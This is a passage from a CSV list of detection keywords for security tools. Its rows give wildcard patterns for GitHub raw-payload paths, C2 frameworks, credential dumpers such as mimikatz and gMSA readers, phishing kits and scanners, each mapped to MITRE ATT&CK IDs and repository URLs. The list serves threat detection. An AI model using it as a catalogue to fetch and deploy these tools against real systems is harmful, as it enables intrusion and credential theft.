!","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.docm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.dos*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.exe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.go*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.gz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.hta*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.iso*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.jar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.js*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.lnk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.log*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.mac*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.mam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.msi*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.msp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.nexe*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.nim*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.otm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.out*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ova*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pem*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pfx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pl*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.plx*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ppk*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ps1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.psm1*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pub*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.py*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pyc*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.pyo*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.rar*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.raw*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.reg*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.rgs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.RGS*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.run*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.scpt*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.script*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sct*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ssh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.sys*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.teamserver*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.temp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.tgz*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.tmp*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vb*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vbs*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.vbscript*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.ws*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.wsf*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.wsh*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.X86*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.X86_64*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlam*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.xlsm*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/github.com/*/raw/main/*.zip*","greyware_tool_keyword","github","Github raw access content - abused by malwares to retrieve payloads","T1119","TA0009","N/A","N/A","Collection","https://github.com/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*/GithubC2.git*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*/gkrellm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/glit.git*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*/glit-cli*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*/glit-core*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"*/globeimposter.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/gmailC2.exe*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" +"*/gMSA_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/gMSADumper*","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","2","190","34","2023-08-23T13:32:49Z","2021-04-10T00:15:24Z" +"*/GMSAPasswordReader.git*","offensive_tool_keyword","GMSAPasswordReader","Reads the password blob from a GMSA account using LDAP and parses the values into hashes for re-use.","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/rvazarkar/GMSAPasswordReader","1","1","N/A","7","2","103","23","2023-02-17T14:37:40Z","2020-01-19T19:06:20Z" +"*/gobuster.git*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobuster/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdir/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobusterdns/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gobustergcs/*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/gocrack.git*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/.hashcat*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack/server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_server*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack_worker*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/gocrack-1.0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*/goDoH.git*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*/godoh/*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*/GoFetch.git*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*/golang_c2.git*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*/GoldenGMSA.git*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*/goMatrixC2.git*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*/go-mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/vyrus001/go-mimikatz","1","1","N/A","10","6","593","105","2022-09-08T18:14:20Z","2015-10-22T08:43:38Z" +"*/GONET-Scanner/*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","1","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" +"*/GoodSync-vsub-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*/goPassGen.git*","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tools","https://github.com/bigb0sss/goPassGen","1","1","N/A","8","1","20","3","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z" +"*/gopher-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/gophish.db*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gophish/*","offensive_tool_keyword","gophish","Open-Source Phishing Toolkit","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/gophish/gophish","1","1","N/A","10","10","9759","1877","2023-09-28T02:03:58Z","2013-11-18T23:26:43Z" +"*/gorsair.go*","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/Ullaakut/Gorsair","1","1","N/A","N/A","9","825","74","2023-09-09T13:18:33Z","2018-08-02T16:49:14Z" +"*/go-secdump.git*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*/gosecretsdump*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/Gotato.git*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege 